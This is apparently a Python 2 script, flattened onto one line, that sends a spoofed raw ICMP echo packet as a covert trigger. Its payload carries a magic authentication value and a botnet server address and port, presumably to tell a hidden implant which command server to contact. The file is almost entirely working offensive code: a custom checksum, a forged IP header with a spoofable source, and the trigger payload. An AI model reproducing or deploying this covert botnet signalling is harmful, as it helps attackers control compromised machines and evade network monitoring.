#!/usr/bin/env python import socket import sys import os from struct import * import time # botnet_serv = 0xc0a87901 botnet_port = 0x216c # Covert channel;-) AUTH = 0x78563412 # modify the source IP and destination IP as you want: src_ip = '' dst_ip = '' def checksum(str): #print "checksum" csum = 0 countTo = (len(str) / 2) * 2 count = 0 while count < countTo: thisVal = ord(str[count+1]) * 256 + ord(str[count]) csum = csum + thisVal csum = csum & 0xffffffffL # count = count + 2 if countTo < len(str): csum = csum + ord(str[len(str) - 1]) csum = csum & 0xffffffffL # csum = (csum >> 16) + (csum & 0xffff) csum = csum + (csum >> 16) answer = ~csum answer = answer & 0xffff answer = answer >> 8 | (answer << 8 & 0xff00) return answer try: sd = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) except socket.error, msg: print 'Socket could not be created. Err code: ' + str(msg[0]) + ' Message ' + msg[1] exit() packet = ''; # construct IP header ip_ver = 4 ip_ihl = 5 ip_tos = 0 ip_tot_len = 0 # kernel will fill the correct total length ip_id = 54321 #Id of this packet ip_frag_off = 0 ip_ttl = 255 ip_proto = socket.IPPROTO_ICMP ip_check = 0 # kernel will fill the correct checksum ip_saddr = socket.inet_aton ( src_ip ) #Spoof the source ip address if you want to ip_daddr = socket.inet_aton ( dst_ip ) ip_ihl_ver = (ip_ver << 4) + ip_ihl ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr) ID = os.getpid() & 0xffff icmp_check = 0 # construct ICMP header icmp_header = pack("bbHHh", 8, 0, icmp_check, ID, 1) # payload data = pack("!IIH", AUTH, botnet_serv, botnet_port); #checksum icmp_check = checksum(icmp_header + data) icmp_check = socket.htons(icmp_check) icmp_header = pack("bbHHh", 8, 0, icmp_check, ID, 1) # This is our customized packet packet = ip_header + icmp_header + data sd.sendto(packet, (dst_ip, 0))